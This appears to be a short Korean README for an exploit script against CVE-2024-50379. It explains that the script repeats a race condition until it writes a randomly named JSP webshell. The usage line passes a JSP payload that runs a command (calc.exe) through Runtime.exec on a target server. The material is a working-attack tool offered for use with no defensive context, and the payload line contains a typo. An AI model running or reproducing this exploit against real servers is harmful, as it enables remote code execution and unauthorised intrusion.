
CVE-2024-50379-exp
테스트 결과 첫 번째 조건 경쟁 시 웹쉘 쓰기가 실패할 확률이 매우 높으며, 다시 한 번 조건 경쟁을 수행해야 웹쉘이 쓰여지는 것을 발견했습니다. 따라서 스크립트는 먼저 고정된 6초 동안 조건 경쟁을 수행하여 쓰기 성공 여부를 확인하고, 실패할 경우 사용자 지정 또는 기본 10초로 다시 시도합니다. 생성된 웹쉘은 무작위 md5.jsp입니다.
python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
image